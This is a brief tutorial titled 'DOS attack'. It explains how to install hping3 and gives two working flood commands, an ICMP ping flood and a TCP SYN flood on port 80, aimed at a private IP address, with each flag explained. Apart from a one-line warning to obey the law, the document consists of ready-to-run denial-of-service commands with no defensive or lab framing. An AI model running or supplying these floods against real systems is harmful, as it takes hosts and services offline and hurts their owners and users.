DOS attack
WARNING: ABIDE THE LAW AND TAKE RESPONSIBILITY FOR YOUR OWN ACTIONS.
Install hping3
:
sudo apt install hping3
Perform ICMP (ping) attack:
sudo hping3 --flood -V -1 192.168.3.32
--flood
: sending packages as fast as possible
-V
: verbose output
-1
: specify ICMP (ping) protocol
Perform TCP SYN attack
sudo hping3 --flood -V -S -p 80 192.168.3.32
-S
: specify TCP SYN protocol
-p
specify the destination port